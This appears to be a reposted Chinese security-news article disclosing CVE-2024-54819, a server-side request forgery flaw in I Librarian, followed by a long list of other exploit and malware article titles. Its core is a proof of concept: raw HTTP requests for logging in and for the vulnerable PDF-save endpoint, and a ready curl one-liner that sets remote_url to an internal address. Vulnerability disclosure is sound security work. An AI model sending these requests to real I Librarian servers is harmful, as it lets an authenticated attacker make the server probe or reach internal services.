CVE-2024-54819 - I Librarian 服务器端请求伪造

科技 2024-12-31 13:48 广东

CVE-2024-54819

阅读更多详细信息：https: //www.partywave.site 关于 CVE-2024-54819

POST 请求登录

攻击者必须被记录

POST /librarian/index.php/authentication HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
[removed ...]
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Client-Width: 1920
X-Requested-With: XMLHttpRequest
Content-Length: 110
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/librarian/
Cookie: IL=[LIBRARIAN COOKIE] # for example: IL=poscnjta68n2691tehd5gt9k9e
[removed ...]

username=[USERNAME]&password=[PASSWORD]&csrfToken=[CSRF_TOKEN]

POST 请求保存 PDF

remote_url parameter容易受到弱验证的影响

POST /librarian/index.php/pdf/save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
[removed ...]
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Client-Width: 1920
X-Requested-With: XMLHttpRequest
Content-Length: 135
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/librarian/index.php/item
Cookie: IL=[LIBRARIAN COOKIE] # for example: IL=poscnjta68n2691tehd5gt9k9e
[removed ...]

remote_url=[PAYLOAD]&id=[PDF_ID]&csrfToken=[CSRF_TOKEN]

Bash 单行命令

这个单行代码是一个利用服务器端请求伪造的示例值的示例：

curl -X POST http://127.0.0.1/librarian/index.php/pdf/save -H "Content-Type: application/x-www-form-urlencoded" -H "Cookie: IL=rcidrisa6hukk5amtmol06b0if" --data-urlencode "remote_url=http://0:6565" --data-urlencode "id=2" --data-urlencode "csrfToken=f3aa558cc79ebf4c48ee042ad61aeaebdf9e9a52b44c64174de398f4f46959df" --proxy http://127.0.0.1:8080

项目地址：

https://github.com/partywavesec/CVE-2024-54819?tab=readme-ov-file

感谢您抽出

来阅读本文

点它，分享点赞在看都在这里

Ots安全

持续发展共享方向：威胁情报、漏洞情报、恶意分析、渗透技术（工具）等，不会回复任何私信，感谢关注。

最新文章

伪造的 7-Zip 漏洞代码被追溯到人工智能产生的误解

LDAPNightmare：SafeBreach Labs 发布了 CVE-2024-49113 的第一个概念验证漏洞

已修补但仍然存在漏洞：Windows BitLocker 加密再次被绕过

LdapNightmare 一个 PoC 工具，用于针对 CVE-2024-49112 易受攻击 Windows Server

（反）EDR 概要

BootExecute EDR 绕过

7-Zip 零日漏洞据称已在网上泄露

80 万辆电动汽车及车主的客户数据被曝光

新细节揭示黑客如何劫持 35 个 Google Chrome 扩展程序

概念验证远程桌面（RDP）会话劫持实用程序

利用 AD CS 错误配置，允许从任何子域到整个林的权限升级和持久化

CVE-2024-54819 - I Librarian 服务器端请求伪造

Linux 内核漏洞 CVE-2023-4147：针对权限提升缺陷的 PoC 漏洞已发布

CVE-2024-21182 - Oracle Weblogic Server 漏洞利用 PoC 发布

Krueger 是一种概念验证 (PoC) .NET 后利用工具

黑客发布第二批被盗思科数据

Delinea 协议处理程序 - 通过更新进程执行远程代码（CVE-2024-12908）

Grafana 渗透测试综合指南

通过 X-Forwarded-Host 泄露密码重置令牌

通过追溯签名驱动程序和系统时间操纵绕过 EDR

CVE-2024-50379 Tomcat 漏洞深度分析及 POC（严重性 9.8）

利用 Windows Defender 进行武器化：新攻击绕过 EDR

绕过Elastic EDR进行横向移动

探索 NASA CryptoLib 的 SDLS 实现中的漏洞

利用 WDAC 武器化：粉碎 EDR 的梦想

CVE-2024-56337：Apache Tomcat 修补关键 RCE 漏洞

通过 Discord Bot 运行的 RAT 恶意软件

Lumma Stealer 信息窃取程序的反混淆

仅使用 NTAPI 函数修补 WDigest.dll 即可绕过 Credential Guard

iDRAC 到域管理员

使用 SetWindowsHookEx 的键盘记录器

俄罗斯 APT“秘密暴雪”利用网络犯罪工具发动乌克兰攻击

一个不起眼的 PHP 漏洞如何导致 Craft CMS 出现 RCE

近期水坑攻击案例（第一部分）

8,000 美元漏洞赏金亮点：Opera 浏览器中的 XSS 到 RCE

新的Windows权限提升漏洞！ SSD 咨询 – cldflt 基于堆的溢出 (PE)

近日，国家互联网应急中心（CNCERT）发布一份报告，揭示了两起针对我国大型科技企业的网络攻击事件

麦当劳外卖系统中的漏洞：从一分钱的订单到订单劫持

隐藏有效负载：在图像文件中嵌入Shellcode

Svartalfheim - 使用间接系统调用和返回地址欺骗下载远程有效负载并在内存中执行的第 0 阶段 Shellcode

攻击者利用 Microsoft Teams 和 AnyDesk 部署 DarkGate 恶意软件

从剪贴板到入侵：PowerShell自攻

自动化漏洞利用工程：从理论到实践的旅程

使用 Android 应用检测 ARP 欺骗攻击

俄罗斯招募乌克兰未成年人参与网络行动和侦察

通过 CVE-2024-52875 攻击 Kerio Control：从 CRLF 注入到一键 RCE

通过 JAAS 进行 Databricks JDBC 攻击

CVE-2024-38819：Spring 框架路径遍历 PoC 漏洞已发布

知名开源生物医学工具（InVesalius 3.1）存在远程代码执行漏洞 CVE-2024-42845

通过云端入侵汽车摄像头

分类

时事

民生

政务

教育

文化

科技

财富

体娱

健康

情感

旅行

百科

职场

楼市

企业

乐活

学术

汽车

时尚

创业

美食

幽默

美体

文摘

原创标签

时事社会财经军事教育体育科技汽车科学房产搞笑综艺明星音乐动漫游戏时尚健康旅游美食生活摄影宠物职场育儿情感小说曲艺文化历史三农文学娱乐电影视频图片新闻宗教电视剧纪录片广告创意壁纸头像心灵鸡汤星座命理教育培训艺术文化金融财经健康医疗美妆时尚餐饮美食母婴育儿社会新闻工业农业时事政治星座占卜幽默笑话独立短篇连载作品文化历史科技互联网

发布位置

广东北京山东江苏河南浙江山西福建河北上海四川陕西湖南安徽湖北内蒙古江西云南广西甘肃辽宁黑龙江贵州新疆重庆吉林天津海南青海宁夏西藏香港澳门台湾美国加拿大澳大利亚日本新加坡英国西班牙新西兰韩国泰国法国德国意大利缅甸菲律宾马来西亚越南荷兰柬埔寨俄罗斯巴西智利卢森堡芬兰瑞典比利时瑞士土耳其斐济挪威朝鲜尼日利亚阿根廷匈牙利爱尔兰印度老挝葡萄牙乌克兰印度尼西亚哈萨克斯坦塔吉克斯坦希腊南非蒙古奥地利肯尼亚加纳丹麦津巴布韦埃及坦桑尼亚捷克阿联酋安哥拉